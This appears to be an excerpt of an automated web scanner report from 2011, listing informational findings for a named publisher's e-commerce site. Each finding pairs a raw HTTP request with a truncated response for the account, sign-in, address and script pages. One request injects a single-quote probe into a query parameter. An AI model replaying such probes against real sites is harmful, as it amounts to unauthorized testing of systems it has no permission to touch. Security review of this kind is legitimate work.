HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:19:46 GMT Server: Apache Content-Type: text/html;charset=ISO Connection: close Content-Length: 20193 <!--createAccount.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www. ...[SNIP]... </script> <script type="text/javascript" src="//secure.quantserve ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | /password.do |
GET /password.do HTTP/1.1 Host: ecommerce.randomhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RES_SESSIONID=212207 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:19:32 GMT Server: Apache Content-Type: text/html;charset=ISO Connection: close Content-Length: 11309 <!-- forgottenPassword.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="htt ...[SNIP]... </script> <script type="text/javascript" src="//secure.quantserve ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | /sign-in-submit.do |
GET /sign-in-submit.do HTTP/1.1 Host: ecommerce.randomhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RES_SESSIONID=212207 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:26:47 GMT Server: Apache Content-Type: text/html;charset=ISO Connection: close Content-Length: 16981 <!-- signIn.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org/ ...[SNIP]... </script> <script type="text/javascript" src="//secure.quantserve ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | /sign-in.do |
GET /sign-in.do?from Host: ecommerce.randomhouse.com Connection: keep-alive Referer: https://ecommerce User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:06:44 GMT Server: Apache Content-Type: text/html;charset=ISO Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 16851 <!-- signIn.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org/ ...[SNIP]... </script> <script type="text/javascript" src="//secure.quantserve ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ecommerce |
Path: | /store/js/rh/ecom.js |
GET /store/js/rh/ecom.js HTTP/1.1 Host: ecommerce.randomhouse.com Proxy-Connection: keep-alive Referer: http://ecommerce User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:06:25 GMT Server: Apache Last-Modified: Wed, 02 Dec 2009 15:30:55 GMT ETag: "a170-ced-8f7f29c0" Accept-Ranges: bytes Content-Length: 3309 Content-Type: application/x-javascript function rh_js_PopWin(url,name var ContextWindow = window.open(url,name ContextWindow.focus(); return false; } function validateEmail(email) { var illegalChars = /[ \(\)\<\> ...[SNIP]... <>[],;:\/#"'); return false; } if( email != "" && !emailFilter.test(email)) { alert("Your e-mail address must contain '@' and end in dot-something (e.g. 'myname@domain.com')"); return false; } return true; } function validateCreate(form) { if( form.firstName.value == '') { alert( 'First Name is required'); return false; } if( form.lastName.value == '') { alert ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ecommerce |
Path: | /store/js/rh/prototype.js |
GET /store/js/rh/prototype.js HTTP/1.1 Host: ecommerce.randomhouse.com Proxy-Connection: keep-alive Referer: http://ecommerce User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:06:24 GMT Server: Apache Last-Modified: Tue, 05 Feb 2008 14:44:22 GMT ETag: "a1de-7131-46b59d80" Accept-Ranges: bytes Content-Length: 28977 Content-Type: application/x-javascript /* Prototype JavaScript framework, version 1.3.1 * (c) 2005 Sam Stephenson <sam@conio.net> * * THIS FILE IS AUTOMATICALLY GENERATED. When sending patches, please diff * against the source ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ecommerce |
Path: | /store/js/rh/s_code.js |
GET /store/js/rh/s_code.js HTTP/1.1 Host: ecommerce.randomhouse.com Proxy-Connection: keep-alive Referer: http://ecommerce User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:06:28 GMT Server: Apache Last-Modified: Mon, 15 Dec 2008 15:25:36 GMT ETag: "a7c7-5db6-74579c00" Accept-Ranges: bytes Content-Length: 23990 Content-Type: application/x-javascript /* SiteCatalyst code version: H.17. Copyright 1997-2008 Omniture, Inc. More info available at http://www.omniture.com */ /************************ ADDITIONAL FEATURES ************************ Plu ...[SNIP]... .hav()+q+(qs?qs:s." +"rq(^C)),0,id,ta);qs`e; +"lush`a()}`2$m`Atl`0o,t ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | //store/js/rh/ecom.js |
GET //store/js/rh/ecom.js HTTP/1.1 Host: ecommerce.randomhouse.com Connection: keep-alive Referer: https://ecommerce User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:49:30 GMT Server: Apache Last-Modified: Wed, 02 Dec 2009 15:30:55 GMT ETag: "a170-ced-8f7f29c0" Accept-Ranges: bytes Content-Length: 3309 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/x-javascript function rh_js_PopWin(url,name var ContextWindow = window.open(url,name ContextWindow.focus(); return false; } function validateEmail(email) { var illegalChars = /[ \(\)\<\> ...[SNIP]... <>[],;:\/#"'); return false; } if( email != "" && !emailFilter.test(email)) { alert("Your e-mail address must contain '@' and end in dot-something (e.g. 'myname@domain.com')"); return false; } return true; } function validateCreate(form) { if( form.firstName.value == '') { alert( 'First Name is required'); return false; } if( form.lastName.value == '') { alert ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | //store/js/rh/prototype |
GET //store/js/rh/prototype Host: ecommerce.randomhouse.com Connection: keep-alive Referer: https://ecommerce User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:49:29 GMT Server: Apache Last-Modified: Tue, 05 Feb 2008 14:44:22 GMT ETag: "a1de-7131-46b59d80" Accept-Ranges: bytes Content-Length: 28977 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/x-javascript /* Prototype JavaScript framework, version 1.3.1 * (c) 2005 Sam Stephenson <sam@conio.net> * * THIS FILE IS AUTOMATICALLY GENERATED. When sending patches, please diff * against the source ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | //store/js/rh/s_code.js |
GET //store/js/rh/s_code.js HTTP/1.1 Host: ecommerce.randomhouse.com Connection: keep-alive Referer: https://ecommerce User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:49:38 GMT Server: Apache Last-Modified: Mon, 15 Dec 2008 15:25:36 GMT ETag: "a7c7-5db6-74579c00" Accept-Ranges: bytes Content-Length: 23990 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/x-javascript /* SiteCatalyst code version: H.17. Copyright 1997-2008 Omniture, Inc. More info available at http://www.omniture.com */ /************************ ADDITIONAL FEATURES ************************ Plu ...[SNIP]... .hav()+q+(qs?qs:s." +"rq(^C)),0,id,ta);qs`e; +"lush`a()}`2$m`Atl`0o,t ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | /store/js/rh/ecom.js |
GET /store/js/rh/ecom.js HTTP/1.1 Host: ecommerce.randomhouse.com Connection: keep-alive Referer: https://ecommerce User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:06:34 GMT Server: Apache Last-Modified: Wed, 02 Dec 2009 15:30:55 GMT ETag: "a170-ced-8f7f29c0" Accept-Ranges: bytes Content-Length: 3309 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/x-javascript function rh_js_PopWin(url,name var ContextWindow = window.open(url,name ContextWindow.focus(); return false; } function validateEmail(email) { var illegalChars = /[ \(\)\<\> ...[SNIP]... <>[],;:\/#"'); return false; } if( email != "" && !emailFilter.test(email)) { alert("Your e-mail address must contain '@' and end in dot-something (e.g. 'myname@domain.com')"); return false; } return true; } function validateCreate(form) { if( form.firstName.value == '') { alert( 'First Name is required'); return false; } if( form.lastName.value == '') { alert ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | /store/js/rh/prototype.js |
GET /store/js/rh/prototype.js HTTP/1.1 Host: ecommerce.randomhouse.com Connection: keep-alive Referer: https://ecommerce User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:06:32 GMT Server: Apache Last-Modified: Tue, 05 Feb 2008 14:44:22 GMT ETag: "a1de-7131-46b59d80" Accept-Ranges: bytes Content-Length: 28977 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/x-javascript /* Prototype JavaScript framework, version 1.3.1 * (c) 2005 Sam Stephenson <sam@conio.net> * * THIS FILE IS AUTOMATICALLY GENERATED. When sending patches, please diff * against the source ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | /store/js/rh/s_code.js |
GET /store/js/rh/s_code.js HTTP/1.1 Host: ecommerce.randomhouse.com Connection: keep-alive Referer: https://ecommerce User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:06:40 GMT Server: Apache Last-Modified: Mon, 15 Dec 2008 15:25:36 GMT ETag: "a7c7-5db6-74579c00" Accept-Ranges: bytes Content-Length: 23990 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/x-javascript /* SiteCatalyst code version: H.17. Copyright 1997-2008 Omniture, Inc. More info available at http://www.omniture.com */ /************************ ADDITIONAL FEATURES ************************ Plu ...[SNIP]... .hav()+q+(qs?qs:s." +"rq(^C)),0,id,ta);qs`e; +"lush`a()}`2$m`Atl`0o,t ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | //account.do |
GET //account.do HTTP/1.1 Host: ecommerce.randomhouse.com Connection: keep-alive Referer: https://ecommerce Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:49:24 GMT Server: Apache Content-Type: text/html;charset=ISO Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 17091 <!-- account.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | //create-address.do |
GET //create-address.do?from= Host: ecommerce.randomhouse.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 23:18:15 GMT Server: Apache Content-Type: text/html;charset=ISO Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 24044 <!-- createAddress.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http:/ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | //email-password.do |
GET //email-password.do?from= Host: ecommerce.randomhouse.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 23:18:11 GMT Server: Apache Content-Type: text/html;charset=ISO Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 18043 <!-- updateEmailPassword.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns=" ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | //select-address.do |
GET //select-address.do?from= Host: ecommerce.randomhouse.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 23:18:15 GMT Server: Apache Content-Type: text/html;charset=ISO Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 16341 <!-- selectAddress.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http:/ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | //view-orders.do |
GET //view-orders.do?from=' HTTP/1.1 Host: ecommerce.randomhouse.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 23:18:12 GMT Server: Apache Content-Type: text/html;charset=ISO Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 14600 <!-- orderHistory.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http:// ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | /account.do |
GET /account.do?from Host: ecommerce.randomhouse.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:06:29 GMT Server: Apache Set-Cookie: JSESSIONID=30BCBB974 Content-Type: text/html;charset=ISO Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 16859 <!-- signIn.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org/ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | /address-validator.do |
GET /address-validator.do Host: ecommerce.randomhouse.com Connection: keep-alive Referer: https://ecommerce X-Prototype-Version: 1.3.1 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:48:48 GMT Server: Apache Content-Type: text/html;charset=ISO Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 158 <html> <head><title>AJAX</title> <body> <div id="information"> <ADDRESS> <CITY>NEW YORK</CITY> <STATE>NY</STATE> </ADDRESS> </div> </body> </html> |
Severity: | Information |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | /create-account-submit.do |
GET /create-account-submit.do HTTP/1.1 Host: ecommerce.randomhouse.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:47:05 GMT Server: Apache Content-Type: text/html;charset=ISO Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 20778 <!--createAccount.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www. ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | /create-account.do |
GET /create-account.do HTTP/1.1 Host: ecommerce.randomhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RES_SESSIONID=212207 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:19:46 GMT Server: Apache Content-Type: text/html;charset=ISO Connection: close Content-Length: 20193 <!--createAccount.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www. ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | /password.do |
GET /password.do HTTP/1.1 Host: ecommerce.randomhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RES_SESSIONID=212207 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:19:32 GMT Server: Apache Content-Type: text/html;charset=ISO Connection: close Content-Length: 11309 <!-- forgottenPassword.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="htt ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | /sign-in-submit.do |
GET /sign-in-submit.do HTTP/1.1 Host: ecommerce.randomhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: RES_SESSIONID=212207 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:26:47 GMT Server: Apache Content-Type: text/html;charset=ISO Connection: close Content-Length: 16981 <!-- signIn.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org/ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://ecommerce |
Path: | /sign-in.do |
GET /sign-in.do?from Host: ecommerce.randomhouse.com Connection: keep-alive Referer: https://ecommerce User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: RES_TRACKINGID=68652 |
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 22:06:44 GMT Server: Apache Content-Type: text/html;charset=ISO Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Length: 16851 <!-- signIn.vm --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org/ ...[SNIP]... |